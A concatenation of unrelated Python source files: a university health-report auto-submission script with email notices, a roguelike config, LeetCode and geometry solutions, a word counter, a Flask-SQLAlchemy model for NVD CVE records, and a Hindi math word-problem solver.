    """Submit the daily report payload built by student_info_parse()."""
    sent_info_url = 'http://yiqing.ctgu.edu.cn/wx/health/saveApply.do'
    r = s.post(url=sent_info_url, headers=headers, data=data)
    # print(r.text)
    # Wait so the server finishes processing before the next request
    time.sleep(30)
    print(r.status_code)
# Email the result notification
def send_rusult(text, fromEmail, passworld, userEmail):
    """Send *text* from *fromEmail* (authenticated with *passworld*, the
    POP3/SMTP auth key) to *userEmail* via QQ Mail's SSL SMTP server.

    A recipient of the literal string 'null' means: skip the email.
    """
    if userEmail == 'null':
        print('用户指定不发送邮件')
        return
    # nowtime = datetime.datetime.now().strftime('%m-%d')
    # msg_from = '' # sender mailbox
    msg_from = fromEmail
    # passwd = '' # auth key
    passwd = passworld
    msg_to = userEmail  # destination mailbox
    subject = '安全上报结果'
    # content = text + '\n' + nowtime
    content = text
    msg = MIMEText(content)
    msg['Subject'] = subject
    msg['From'] = msg_from
    msg['To'] = msg_to
    s = smtplib.SMTP_SSL("smtp.qq.com", 465)
    s.login(msg_from, passwd)
    s.sendmail(msg_from, msg_to, msg.as_string())
    print("邮件发送成功")
    s.quit()
def parse_options(argv):
    """Parse command-line options.

    Requires the sender email (-f/--fromEmail) and the mailbox auth key
    (-k/--pop3Key); prints the usage text and exits otherwise.

    Returns (fromEmail, pop3Key).
    """
    fromEmail = ''
    pop3Key = ''
    helpMsg = "send.py\n" \
              "\tsend.py -f <fromEmail> -k <pop3Key>\n" \
              "\t-f\t\t\t\t邮件发送方邮箱地址\n" \
              "\t--fromEmail\n" \
              "\t-k\t\t\t\t邮箱POP3授权码\n" \
              "\t--pop3Key\n" \
              "\t-h\t\t\t\thelp\n" \
              "\t--help\n"
    # Both the sender address and the key must be supplied.
    if not ((('-f' in argv) or ('--fromEmail' in argv)) and (('-k' in argv) or ('--pop3Key' in argv))):
        print(helpMsg)
        sys.exit()
    # Expected token count: flags plus their values.
    argc = 0
    if ('-h' in argv) or ('--help' in argv):
        argc += 1
    if ('-f' in argv) or ('--fromEmail' in argv):
        argc += 2
    # Bug fix: this branch previously re-tested -f/--fromEmail, so the
    # expected count never accounted for -k/--pop3Key and valid command
    # lines failed the length check below.
    if ('-k' in argv) or ('--pop3Key' in argv):
        argc += 2
    if len(argv) != argc:
        print(helpMsg)
        sys.exit()
    try:
        opts, args = getopt.getopt(argv, "hf:k:", ["help", "fromEmail=", "pop3Key="])
    except getopt.GetoptError:
        print(helpMsg)
        sys.exit(2)
    if not len(opts):
        print(helpMsg)
        sys.exit()
    for option, value in opts:
        if option in ("-h", "--help"):
            print(helpMsg)
        elif option in ("-f", "--fromEmail"):
            if value is None:
                sys.exit()
            fromEmail = value
        elif option in ("-k", "--pop3Key"):
            if value is None:
                sys.exit()
            pop3Key = value
    return fromEmail, pop3Key
def main(argv):
    """Log every configured account in, submit its daily health report,
    and email per-user results plus an admin summary at the end."""
    fromEmail, pop3Key = parse_options(argv)
    # NOTE(review): ``sum`` shadows the builtin here as well.
    username, password, userEmail, name, sum = get_info_from_txt()
    # username, password, userEmail, sum = get_info_from_xlsx()
    print('---------------------------')
    print('账号密码读取成功,共', sum, '人')
    print('---------------------------\n')
    finished = 0
    reported = 0
    # Lines accumulated for the per-user notification email
    userString = []
    # Lines accumulated for the admin summary email
    adminString = []
    adminString.append('---------------------------')
    adminString.append('账号密码读取成功,共' + str(sum) + '人')
    adminString.append('---------------------------' + '\n')
    try:
        for i in range(sum):
            print('')
            headers = {
                'User-Agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Mobile Safari/537.36',
                'Connection': 'close',
            }
            # Fresh session per account so cookies never leak between users.
            s = requests.session()
            s.keep_alive = False
            # print(s)
            # print(headers)
            state = login(s, headers, username[i], password[i])
            if state == 'success':
                print('用户', name[i], username[i], '登录成功')
                # Record the successful login in userString and adminString
                text = '用户 ' + str(name[i]) + str(username[i]) + '登录成功'
                userString.append(text)
                adminString.append(text)
            else:
                print('用户', name[i], username[i], '密码错误,登录失败')
                # Record the failed login in userString and adminString
                text = '用户 ' + str(name[i]) + str(username[i]) + '密码错误,登录失败'
                userString.append(text)
                adminString.append(text)
                # Email the login-failure notice to this user
                send_rusult('\n'.join(userString), fromEmail, pop3Key, userEmail[i])
                # Clear the list so it doesn't leak into the next user's email
                # print('userString:--------- : ', userString)
                userString.clear()
                continue
            html = get_student_info(s, headers)
            try:
                data = student_info_parse(html)
                sent_info(s, headers, data)
                # Parse the page to check whether the report went through
                html = get_success_send_info(s, headers)
                msg = success_send_info_parse(html)
                if msg == '今日已上报':
                    # Record the successful report in userString and adminString
                    text = '用户 ' + name[i] + '-' + str(username[i]) + ' 上报成功'
                    print(text)
                    userString.append(text)
                    adminString.append(text + '\n')
                    # print(userEmail[i])
                    # send_rusult(text, userEmail[i])
                    # Email the success notice to this user
                    send_rusult('\n'.join(userString), fromEmail, pop3Key, userEmail[i])
                    # Clear the list so it doesn't leak into the next user's email
                    # print('userString:--------- : ', userString)
                    userString.clear()
                    # Update counters: reported this run / already reported today
                    reported += 1
                    finished += 1
            except:  # NOTE(review): bare except hides real errors; narrow it
                # Parse the page to check whether the report went through
                html = get_success_send_info(s, headers)
                msg = success_send_info_parse(html)
                if msg == '今日已上报':
                    text = '用户 ' + name[i] + '-' + str(username[i]) + ' 今日已上报'
                    print(text)
                    adminString.append(text + '\n')
                    # print(userEmail[i])
                    # send_rusult(text, userEmail[i])
                    # Count as already reported today
                    reported += 1
                # Clear the list so it doesn't leak into the next user's email
                # print('userString:--------- : ', userString)
                userString.clear()
            # Large random delay between accounts (remote access is slow)
            time.sleep(random.randint(20, 50))
            # time.sleep(random.randint(1, 10))
    finally:
        text = '应报:' + str(sum) + ' 本次上报:' + str(finished) + ' 今日已上报:' + str(reported)
        adminString.append('---------------------------')
        adminString.append(text)
        adminString.append('---------------------------')
        # print('\n'.join(adminString))
        print('---------------------------')
        print(text)
        # send_rusult(text, '管理员邮箱地址')
        # Mail the summary to the admin (the sender's own address)
        send_rusult('\n'.join(adminString), fromEmail, pop3Key, fromEmail)
        print('---------------------------\n')
        # Clear so the lines don't appear in the next run's email
        # print('adminString:--------- : ', adminString)
        userString.clear()
if __name__ == "__main__":
main(sys.argv[1:])
|
#!/usr/bin/env python3.5
# Bug fix: the original used the Python 2 statement ``print f.read()`` (a
# SyntaxError under the python3.5 shebang) and referenced ``f.close`` without
# calling it, so the file was never closed.  ``with`` closes it reliably.
path = r'/home/eaxu/workspace/Python_Scripts/somefile.txt'
with open(path, 'w') as f:
    f.write('Welcome to this file,There is nothing here expect.This is stupid to showing.')
with open(path) as f:
    print(f.read())
|
from enum import Enum, auto
import tcod as libtcod
class GameStates(Enum):
    """Top-level game states driving the input/render loop."""
    PLAYERS_TURN = 1
    ENEMY_TURN = 2
    PLAYER_DEAD = 3
    INVENTORY = 4
    DROP_INVENTORY = 5
    TARGETING = 6
    LEVEL_UP = 7
    CHARACTER_SCREEN = 8
    SHOP = 9
    INSTRUCTIONS = 10
class RenderOrder(Enum):
    """Entity render-order categories (values assigned via auto())."""
    CORPSE = auto()
    STAIRS = auto()
    ITEM = auto()
    ACTOR = auto()
class EquipmentSlots(Enum):
    """Slots an item can be equipped into."""
    MAIN_HAND = auto()
    OFF_HAND = auto()
# Global game/UI configuration constants (sizes in console cells).
CONFIG = {
    "WIDTH" : 80,
    "HEIGHT" : 55,
    "MAP_WIDTH" : 80,
    "MAP_HEIGHT" : 39,
    "MAP_Y" : 4,
    "TITLE" : "Dragons and Dungeons",
    # UI - Upper Bar
    "UPPER_BAR_HEIGHT" : 4,
    # UI - HP Bar
    "BAR_WIDTH" : 20,
    "PANEL_HEIGHT" : 7,
    "PANEL_Y" : 48, # height - panel_height
    # UI - ACTION BAR
    "ACTION_Y" : 43,
    "ACTION_HEIGHT" : 5,
    # UI - Message Log
    # TODO: Find a way to compute these other than using hardcoded constants
    "MESSAGE_X" : 22, # bar width +2
    "MESSAGE_WIDTH" : 58, # width - bar_width - 2
    "MESSAGE_HEIGHT" : 6, # panel_height - 1
    # Procedural Generation
    "ROOM_MAX_SIZE" : 10,
    "ROOM_MIN_SIZE" : 6,
    "MAX_ROOMS" : 30,
    "MAX_MONSTERS" : 3,
    "MAX_ITEMS" : 2,
    # Render
    "FONT_PATH" : "dejavu16x16_gs_tc.png",
    # Field of View
    "FOV_ALGORITHM" : 1,
    "FOV_LIGHT_WALLS" : True,
    "FOV_RADIUS" : 10,
    # Tile colors for explored/visible walls and floors.
    "COLORS": {
        'dark_wall': libtcod.Color(18, 18, 20),
        'dark_ground': libtcod.Color(50, 50, 50),
        'light_wall': libtcod.Color(130, 130, 130),
        'light_ground': libtcod.Color(200, 200, 200),
        'black': libtcod.Color(0, 0, 0)
    }
}
|
# @Title: 插入区间 (Insert Interval)
# @Author: 2464512446@qq.com
# @Date: 2020-11-05 16:46:31
# @Runtime: 40 ms
# @Memory: 15 MB
class Solution:
    def insert(self, intervals: List[List[int]], newInterval: List[int]) -> List[List[int]]:
        """Insert newInterval into sorted disjoint intervals, merging overlaps."""
        lo, hi = newInterval
        merged = []
        placed = False
        for start, end in intervals:
            if end < lo:
                # Entirely to the left of the new interval: keep as-is.
                merged.append([start, end])
            elif start > hi:
                # First interval strictly to the right: emit the (possibly
                # grown) new interval exactly once, then copy the rest.
                if not placed:
                    merged.append([lo, hi])
                    placed = True
                merged.append([start, end])
            else:
                # Overlap: grow the new interval to absorb this one.
                lo = min(start, lo)
                hi = max(end, hi)
        if not placed:
            merged.append([lo, hi])
        return merged
|
import sys
import os
from collections import Counter
### my lib ####
sys.path.append('../')
from .converter.pdf2txt import pdf2txt
stop_words = [ ' am ', ' is ', ' of ', ' and ', ' the ', ' to ', ' it ', ' for ', ' in ', ' as ', ' or ', ' are ', ' be ', ' this ', ' that ', ' will ', ' there ', ' was ', ' a ']
def load_txt(path):
    """Read the whole text file at *path* and return it as a single string."""
    with open(path) as handle:
        return ''.join(handle.readlines())
def remove_stop_words(txt, stop_words):
    """Replace every stop word in *txt* with a single space and return it."""
    for word in stop_words:
        txt = txt.replace(word, ' ')
    # Final normalization pass kept from the original implementation.
    txt = txt.replace(' ', ' ')
    return txt
def main():
    """Word-frequency analysis over every text file in ../plane_text."""
    path_list = ['..', 'plane_text']
    path = os.path.join(*path_list)
    print('analyze dir :', path)
    dirs = os.listdir(path)
    # macOS Finder metadata file; note this raises ValueError when absent.
    dirs.remove('.DS_Store')
    for txt_path in dirs:
        txt_path = os.path.join(*path_list, txt_path)
        print(txt_path)
        txt = load_txt(txt_path)
        txt = txt.replace('-\n', '')  # re-join words hyphenated across lines
        txt = txt.replace('\n', ' ')
        txt = txt.lower()
        txt = remove_stop_words(txt, stop_words)
        txt_list = txt.split()
        # Word -> occurrence count for the cleaned token list.
        count = Counter(txt_list)
        # print(count)
        # with open(txt_path.replace('plane_text', 'analyze'), mode='w') as f:
        #     print('writing ... ', txt_path.replace('plane_txt', 'analyze'))
        #     f.write(txt)
if __name__ == '__main__':
    # Run the analysis when invoked as a script.
    main()
|
from random import random
from math import sqrt, atan2, degrees
class Point:
    """A 2-D point with an id; coordinates get a tiny random jitter so no
    two points ever coincide exactly."""

    def __init__(self, uid, x, y):
        self.id = uid
        # Nudge by ~1e-9 to break exact ties.
        self.x = x + random() / 1e9
        self.y = y + random() / 1e9
        self.r = 0
        self.theta = 0

    def computePolar(self, center):
        """Fill in polar coordinates (r, theta in degrees) about *center*."""
        dx = self.x - center.x
        dy = self.y - center.y
        self.r = sqrt(dx * dx + dy * dy)
        self.theta = degrees(atan2(dy, dx))
def solve():
    """Read one test case and print the point ids sorted by polar angle.

    Input line: n followed by n (x, y) integer pairs.  Points are ordered
    by angle around the centroid; because Python's sort is stable, the
    earlier sort by decreasing radius breaks equal-angle ties.
    """
    data = list(map(int, input().split()))
    n = data[0]
    points = []
    avg_x = 0
    avg_y = 0
    for i in range(1, 2 * n, 2):
        x, y = data[i], data[i + 1]
        points.append(Point(i // 2, x, y))
        avg_x += points[-1].x
        avg_y += points[-1].y
    # The centroid serves as the pole for the polar sort.
    center = Point(-1, avg_x / n, avg_y / n)
    for p in points:
        p.computePolar(center)
    points.sort(key=lambda p: -p.r)
    points.sort(key=lambda p: p.theta)
    print(" ".join([str(p.id) for p in points]))
if __name__ == "__main__":
cases = int(input())
for i in range(cases):
solve()
|
from os import environ
# Third-party e-mail service credentials, sourced from the environment so
# no secrets live in the repository.  Each value is None when the
# corresponding variable is unset.
EXTERNAL_EMAIL_API = environ.get('EXTERNAL_EMAIL_API')
SENDGRID_API_KEY = environ.get('SENDGRID_API_KEY')
MAILGUN_API_KEY = environ.get('MAILGUN_API_KEY')
|
import datetime
from env_vars import db_uri
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
import pandas as pd
# Single shared SQLAlchemy handle; bound to a Flask application in init_db().
db = SQLAlchemy()
def init_db(app=None):
    """Bind the module-level *db* to a Flask app and create all tables.

    :param app: an existing Flask application; when None a throwaway app
        is created purely to provide an application context.
    """
    if app is None:
        # Create flask application for db to use app context
        app = Flask(__name__)
    # Engine/connection-pool tuning passed through SQLALCHEMY_ENGINE_OPTIONS.
    db_config_dict = {
        "pool_pre_ping": True,
        "pool_size": 5,
        # recycle connection after 3600 seconds (one hour)
        "pool_recycle": 3600,
        "pool_timeout": 30,
    }
    with app.app_context():
        app.config["SQLALCHEMY_DATABASE_URI"] = db_uri
        app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
        app.config["SQLALCHEMY_ENGINE_OPTIONS"] = db_config_dict
        db.init_app(app)
        db.create_all()
class CVE(db.Model):
    """
    JSON schema
    - https://csrc.nist.gov/schema/nvd/feed/1.1/nvd_cve_feed_json_1.1.schema
    This model represents a single CVE_Item from the json response of a query to the NVD CVE rest api.
    Example query: https://services.nvd.nist.gov/rest/json/cve/1.0/CVE-2015-5611
    Example model is derived from result["CVE_Items"][0]
    - id = generated by SQLAlchemy
    - cve_id = cve["CVE_data_meta"]["ID"]
    - description = description["description_data"][0]["value"]
    - cvss_v3_version = impact["baseMetricV3"]["cvssV3"]["version"]
    - cvss_v3_vector_string = impact["baseMetricV3"]["cvssV3"]["vectorString"]
    - cvss_v3_attack_vector = impact["baseMetricV3"]["cvssV3"]["attackVector"]
    - cvss_v3_attack_complexity = impact["baseMetricV3"]["cvssV3"]["attackComplexity"]
    - cvss_v3_privileges_required = impact["baseMetricV3"]["cvssV3"]["privilegesRequired"]
    - cvss_v3_user_interaction = impact["baseMetricV3"]["cvssV3"]["userInteraction"]
    - cvss_v3_scope = impact["baseMetricV3"]["cvssV3"]["scope"]
    - cvss_v3_confidentiality_impact = impact["baseMetricV3"]["cvssV3"]["confidentialityImpact"]
    - cvss_v3_integrity_impact = impact["baseMetricV3"]["cvssV3"]["integrityImpact"]
    - cvss_v3_availability_impact = impact["baseMetricV3"]["cvssV3"]["availabilityImpact"]
    - cvss_v3_base_score = impact["baseMetricV3"]["cvssV3"]["baseScore"]
    - cvss_v3_base_severity = impact["baseMetricV3"]["cvssV3"]["baseSeverity"]
    - base_metric_v3_exploitability_score = impact["baseMetricV3"]["exploitabilityScore"]
    - base_metric_v3_impact_score = impact["baseMetricV3"]["impactScore"]
    - cvss_v3_impact_score = impact["baseMetricV3"]["impactScore"]
    - cvss_v2_version = impact["baseMetricV2"]["cvssV2"]["version"]
    - cvss_v2_vector_string = impact["baseMetricV2"]["cvssV2"]["vectorString"]
    - cvss_v2_access_vector = impact["baseMetricV2"]["cvssV2"]["accessVector"]
    - cvss_v2_access_complexity = impact["baseMetricV2"]["cvssV2"]["accessComplexity"]
    - cvss_v2_authentication = impact["baseMetricV2"]["cvssV2"]["authentication"]
    - cvss_v2_confidentiality_impact = impact["baseMetricV2"]["cvssV2"]["confidentialityImpact"]
    - cvss_v2_integrity_impact = impact["baseMetricV2"]["cvssV2"]["integrityImpact"]
    - cvss_v2_availability_impact = impact["baseMetricV2"]["cvssV2"]["availabilityImpact"]
    - cvss_v2_base_score = impact["baseMetricV2"]["cvssV2"]["baseScore"]
    - base_metric_v2_severity = impact["baseMetricV2"]["severity"]
    - base_metric_v2_exploitability_score = impact["baseMetricV2"]["exploitabilityScore"]
    - base_metric_v2_impact_score = impact["baseMetricV2"]["impactScore"]
    - base_metric_v2_obtain_all_privilege = impact["baseMetricV2"]["obtainAllPrivilege"]
    - base_metric_v2_obtain_user_privilege = impact["baseMetricV2"]["obtainUserPrivilege"]
    - base_metric_v2_obtain_other_privilege = impact["baseMetricV2"]["obtainOtherPrivilege"]
    - base_metric_v2_user_interaction_required = impact["baseMetricV2"]["userInteractionRequired"]
    - published_date = publishedDate
    - last_modified_date = lastModifiedDate
    - full_cve_json = ["CVE_Items"][0]
    - record_creation_date = generated by SQLAlchemy
    """
    # Surrogate primary key; cve_id is intentionally NOT unique so that
    # successive revisions of the same CVE can coexist as separate rows
    # (see get_last_modified_record_by_cve_id below).
    id = db.Column(db.Integer, primary_key=True)
    cve_id = db.Column(db.String(75), nullable=False)
    description = db.Column(db.Text, nullable=False)
    # --- CVSS v3 metrics (nullable: absent for entries without v3 data) ---
    cvss_v3_version = db.Column(db.String(75))
    cvss_v3_vector_string = db.Column(db.String(75))
    cvss_v3_attack_vector = db.Column(db.String(75))
    cvss_v3_attack_complexity = db.Column(db.String(75))
    cvss_v3_privileges_required = db.Column(db.String(75))
    cvss_v3_user_interaction = db.Column(db.String(75))
    cvss_v3_scope = db.Column(db.String(75))
    cvss_v3_confidentiality_impact = db.Column(db.String(75))
    cvss_v3_integrity_impact = db.Column(db.String(75))
    cvss_v3_availability_impact = db.Column(db.String(75))
    cvss_v3_base_score = db.Column(db.Float)
    cvss_v3_base_severity = db.Column(db.String(75))
    base_metric_v3_exploitability_score = db.Column(db.Float)
    base_metric_v3_impact_score = db.Column(db.Float)
    # --- CVSS v2 metrics (nullable for the same reason) ---
    cvss_v2_version = db.Column(db.String(75))
    cvss_v2_vector_string = db.Column(db.String(75))
    cvss_v2_access_vector = db.Column(db.String(75))
    cvss_v2_access_complexity = db.Column(db.String(75))
    cvss_v2_authentication = db.Column(db.String(75))
    cvss_v2_confidentiality_impact = db.Column(db.String(75))
    cvss_v2_integrity_impact = db.Column(db.String(75))
    cvss_v2_availability_impact = db.Column(db.String(75))
    cvss_v2_base_score = db.Column(db.Float)
    base_metric_v2_severity = db.Column(db.String(75))
    base_metric_v2_exploitability_score = db.Column(db.Float)
    base_metric_v2_impact_score = db.Column(db.Float)
    base_metric_v2_obtain_all_privilege = db.Column(db.Boolean)
    base_metric_v2_obtain_user_privilege = db.Column(db.Boolean)
    base_metric_v2_obtain_other_privilege = db.Column(db.Boolean)
    base_metric_v2_user_interaction_required = db.Column(db.Boolean)
    published_date = db.Column(db.DateTime, nullable=False)
    last_modified_date = db.Column(db.DateTime)
    # Raw CVE_Item payload retained verbatim for auditing / re-parsing.
    full_cve_json = db.Column(db.JSON, nullable=False)
    record_creation_date = db.Column(
        db.DateTime, nullable=False, default=datetime.datetime.utcnow
    )
    __tablename__ = "cve"
    def save(self):
        """Persist this instance and commit immediately."""
        db.session.add(self)
        db.session.commit()
    @staticmethod
    def is_record_present(nvd_cve_id):
        """
        Return true if a record in the table contains the nvd_cve_id
        """
        result = CVE.query.filter_by(cve_id=nvd_cve_id).scalar()
        return result is not None
    @staticmethod
    def get_records_by_cve_id(nvd_cve_id):
        """
        Return result set of all records with input cve_id
        """
        result_set = CVE.query.filter_by(cve_id=nvd_cve_id).all()
        return result_set
    @staticmethod
    def get_last_modified_record_by_cve_id(nvd_cve_id):
        """
        Return cve with the most recent last_modified_date.
        """
        # NOTE(review): the `is None` branch below is unreachable because
        # last_modified_record starts as result_set[0]; also `>` raises
        # TypeError if any last_modified_date is NULL (the column is
        # nullable) -- confirm ingestion always sets it.
        result_set = CVE.get_records_by_cve_id(nvd_cve_id)
        if result_set:
            last_modified_record = result_set[0]
            for record in result_set:
                if last_modified_record is None:
                    last_modified_record = record
                elif (
                    record.last_modified_date > last_modified_record.last_modified_date
                ):
                    last_modified_record = record
        else:
            last_modified_record = None
        return last_modified_record
    @staticmethod
    def get_entities_dict():
        """Ordered mapping of column name -> model attribute; used to
        build queries over a subset of columns."""
        return {
            "id": CVE.id,
            "cve_id": CVE.cve_id,
            "description": CVE.description,
            "cvss_v3_version": CVE.cvss_v3_version,
            "cvss_v3_vector_string": CVE.cvss_v3_vector_string,
            "cvss_v3_attack_vector": CVE.cvss_v3_attack_vector,
            "cvss_v3_attack_complexity": CVE.cvss_v3_attack_complexity,
            "cvss_v3_privileges_required": CVE.cvss_v3_privileges_required,
            "cvss_v3_user_interaction": CVE.cvss_v3_user_interaction,
            "cvss_v3_scope": CVE.cvss_v3_scope,
            "cvss_v3_confidentiality_impact": CVE.cvss_v3_confidentiality_impact,
            "cvss_v3_integrity_impact": CVE.cvss_v3_integrity_impact,
            "cvss_v3_availability_impact": CVE.cvss_v3_availability_impact,
            "cvss_v3_base_score": CVE.cvss_v3_base_score,
            "cvss_v3_base_severity": CVE.cvss_v3_base_severity,
            "base_metric_v3_exploitability_score": CVE.base_metric_v3_exploitability_score,
            "base_metric_v3_impact_score": CVE.base_metric_v3_impact_score,
            "cvss_v2_version": CVE.cvss_v2_version,
            "cvss_v2_vector_string": CVE.cvss_v2_vector_string,
            "cvss_v2_access_vector": CVE.cvss_v2_access_vector,
            "cvss_v2_access_complexity": CVE.cvss_v2_access_complexity,
            "cvss_v2_authentication": CVE.cvss_v2_authentication,
            "cvss_v2_confidentiality_impact": CVE.cvss_v2_confidentiality_impact,
            "cvss_v2_integrity_impact": CVE.cvss_v2_integrity_impact,
            "cvss_v2_availability_impact": CVE.cvss_v2_availability_impact,
            "cvss_v2_base_score": CVE.cvss_v2_base_score,
            "base_metric_v2_severity": CVE.base_metric_v2_severity,
            "base_metric_v2_exploitability_score": CVE.base_metric_v2_exploitability_score,
            "base_metric_v2_impact_score": CVE.base_metric_v2_impact_score,
            "base_metric_v2_obtain_all_privilege": CVE.base_metric_v2_obtain_all_privilege,
            "base_metric_v2_obtain_user_privilege": CVE.base_metric_v2_obtain_user_privilege,
            "base_metric_v2_obtain_other_privilege": CVE.base_metric_v2_obtain_other_privilege,
            "base_metric_v2_user_interaction_required": CVE.base_metric_v2_user_interaction_required,
            "published_date": CVE.published_date,
            "last_modified_date": CVE.last_modified_date,
            "full_cve_json": CVE.full_cve_json,
            "record_creation_date": CVE.record_creation_date,
        }
    def __repr__(self):
        return "<CVE %r>" % self.cve_id
class CPE_Match(db.Model):
    """
    JSON schema
    {
    "cpe23Uri" : "cpe:2.3:a:\\$0.99_kindle_books_project:\\$0.99_kindle_books:6:*:*:*:*:android:*:*",
    "cpe_name" :
        [
            {
            "cpe23Uri" : "cpe:2.3:a:\\$0.99_kindle_books_project:\\$0.99_kindle_books:6:*:*:*:*:android:*:*"
            }
        ]
    }
    This model represents a single `match` from the `matches` list in nvdcpematch-1.0.json.
    """
    id = db.Column(db.Integer, primary_key=True)
    cpe_23_uri = db.Column(db.String, nullable=False)
    cpe_name = db.Column(
        db.Text, nullable=True
    )  # This is a list of dicts that we will turn into a comma sep string on model creation.
    # Raw match payload retained verbatim for auditing / re-parsing.
    full_cpe_match_json = db.Column(db.JSON, nullable=False)
    record_creation_date = db.Column(
        db.DateTime, nullable=False, default=datetime.datetime.utcnow
    )
    __tablename__ = "cpe_match"
    def save(self):
        """Persist this instance and commit immediately."""
        db.session.add(self)
        db.session.commit()
    @staticmethod
    def get_records_by_cpe_23_uri(cpe_23_uri):
        """
        Return result set of all records with input cpe_23_uri
        """
        result_set = CPE_Match.query.filter_by(cpe_23_uri=cpe_23_uri).all()
        return result_set
    def __repr__(self):
        return "<CPE_Match %r>" % self.cpe_23_uri
def get_cve_query_df_with_columns(col_names_list=None):
    """
    Build a SQLAlchemy query over the CVE table restricted to the given columns.

    :param col_names_list: column names (keys of CVE.get_entities_dict());
        None selects every column.
    :return: pandas DataFrame of the query result, ordered by
        published_date ascending (via pandas.read_sql on db.engine).
    """
    entities_dict = CVE.get_entities_dict()
    if col_names_list is None:
        entities_list = entities_dict.values()
    else:
        entities_list = [entities_dict[col_name] for col_name in col_names_list]
    query_statement = (
        CVE.query.order_by(CVE.published_date.asc())
        .with_entities(*entities_list)
        .statement
    )
    return pd.read_sql(query_statement, db.engine)
def get_cvss_v3_cols():
    """Return CVE column names relevant to CVSS v3, i.e. every column
    whose name does not mention v2 (shared columns included)."""
    return [name for name in CVE.get_entities_dict() if "v2" not in name]
def get_cvss_v2_cols():
    """Return CVE column names relevant to CVSS v2, i.e. every column
    whose name does not mention v3 (shared columns included)."""
    return [name for name in CVE.get_entities_dict() if "v3" not in name]
|
# coding=utf-8
from __future__ import division
from collections import OrderedDict
from makeVerbDict import makeVerbDictionary
from Containers import Container
from Question import Question
from numbers import Number
# POS tags treated as verb-like when categorising a sentence's action.
verbTags = ['VM','PSP','NST','VAUX']
# Verb statistics loaded from the tagged training corpus; values are
# indexed 0-4 per verb category with the total at index 5 (see
# categoriseVerb) -- presumably built by makeVerbDictionary; confirm there.
trainingDictionary = makeVerbDictionary("POSOutWithVC.txt")
# Replacing it with synset later
# Hindi words meaning "total/all" that mark a question asking for a sum.
questionWords = ['कुल', 'समस्त', 'सब', 'पूरा', 'सारा', 'संपूर्ण', 'सम्पूर्ण', 'पूर्ण', 'समूचा', 'सर्व', 'निखिल', 'अकत', 'अखिल', 'सकल', 'तमाम', 'मुसल्लम', 'विश्वक', 'कामिल', 'अवयवी', 'अशेष', 'भर', 'विश्व']
def main():
    """Parse POS-tagged sentences from POSOut.txt, build per-person
    quantity containers, then answer the final (question) sentence.

    Python 2 code: uses print statements and dict.iteritems().
    """
    global j
    lines = []
    with open("POSOut.txt") as tagged_file:
        lines = tagged_file.readlines()
    sentences = []
    for i in range(0, len(lines)):
        lines[i] = lines[i].rstrip("\n")
    # Collect each <s> ... </s> span as an OrderedDict of tag -> word.
    # NOTE(review): keying by POS tag means a repeated tag in one sentence
    # keeps only the last word -- confirm that is acceptable upstream.
    for i in range(0, len(lines) - 1):
        if lines[i] == '<s>':
            sentence = OrderedDict()
            for j in range(i + 1, len(lines)):
                if lines[j] == '</s>':
                    i = j
                    break
                else:
                    tag, word = lines[j].split(" ")
                    # print (tag + word)
                    sentence[tag] = word
                    # sentence[]
            sentences.append(sentence)
        else:
            continue
    question = Question()
    sentence_number= 0
    # Process every sentence except the last one (the question itself).
    for i in range(0,len(sentences)-1):
        if sentence_number == 0:
            containerFirstSentence(sentences[i], question)
        else:
            containerOtherSentence(sentences[i], question,sentence_number)
            # After creating copy containers, call modify on same sentence by passing the same copied container
            modifyContainer(sentences[i],question,sentence_number)
        sentence_number += 1
    name = ""
    quantity = ""
    entity = ""
    attribute = ""
    pronoun = ""
    # False means past
    tense = ""
    totalKeyword = False
    # Inspect the question sentence: who it asks about, its tense
    # ('hai' = present, 'tha' = past) and whether it asks for a total.
    for key, value in sentences[len(sentences)-1].iteritems():
        if value == "NNP":
            name = key
        if value == 'PNP':
            pronoun = key
        if key == 'है':
            tense = "PRESENT"
        if key == 'था':
            tense = "PAST"
        if key in questionWords:
            totalKeyword = True
    if tense == "":
        tense = "PRESENT"
    print "Container1"
    question.printContainer1()
    print "Container2"
    question.printContainer2()
    containerArrayToBePassed = None
    result = None
    # A "total" question sums both containers; otherwise solve only the
    # container belonging to the person named in the question.
    if totalKeyword == True:
        result = solution(tense,question.container1,question.container2)
    else:
        if name == question.container1[len(sentences)-2].name:
            containerArrayToBePassed = question.container1
        else:
            containerArrayToBePassed = question.container2
        result = solution(tense,containerArrayToBePassed)
    print "The final result is: ",
    print result
def solution(tense, container1, container2 = None):
    """Evaluate the accumulated quantity expression(s).

    PRESENT tense: evaluate the last quantity expression of container1
    (plus container2's when given, for "total" questions).
    PAST tense: treat the last two states of container1 as the equation
    'previous = current' and solve for the unknown operand.
    Python 2 code (print statements).
    """
    print tense
    result = 0
    if tense == "PRESENT":
        if container2 is None:
            expression = container1[len(container1)-1].quantity.split(" ")
            print "Equation is: "+container1[len(container1)-1].quantity
            return getExpressionResult(expression)
        else:
            expression = container1[len(container1)-1].quantity.split(" ")
            print "Equation is: "+container1[len(container1)-1].quantity
            result += getExpressionResult(expression)
            expression = container2[len(container2)-1].quantity.split(" ")
            print "Equation is: "+container2[len(container2)-1].quantity
            result += getExpressionResult(expression)
            return result
    if tense == "PAST":
        print "Hello"
        left_side = container1[len(container1)-2].quantity.split(" ")
        right_side = container1[len(container1)-1].quantity.split(" ")
        print "Equation is :"
        print container1[len(container1)-2].quantity,
        print " = ",
        print container1[len(container1)-1].quantity
        return getEquationResult(left_side, right_side)
def getExpressionResult(expression):
    """Evaluate a tokenised expression of the form [a, op, b] or [a].

    Tokens are strings; op is '+' or '-'.  A lone operand is returned as
    a float; an unrecognised operator yields 0.
    """
    if len(expression) != 3:
        return float(expression[0])
    lhs = float(expression[0])
    rhs = float(expression[2])
    op = expression[1].strip()
    if op == "+":
        return lhs + rhs
    if op == "-":
        return lhs - rhs
    return 0
def getEquationResult(left_side, right_side):
    """Solve 'x op b = c' for x, given left_side = [x, op, b] and
    right_side = [c] (all tokens strings).  Unknown ops yield 0."""
    known = float(right_side[0])
    operand = float(left_side[2])
    op = left_side[1].strip()
    if op == "+":
        return known - operand
    if op == "-":
        return known + operand
    return 0
def modifyContainer(sentence, question, sentence_number):
    """Apply the current sentence's action to the quantity expressions of
    the two containers at index *sentence_number*.

    Scans the tagged sentence for proper nouns, pronouns, verbs and a
    quantity (QC), classifies the verbs into an action category, then
    appends '+ val' / '- val' to the affected container(s).
    Python 2 code (dict.iteritems()).
    """
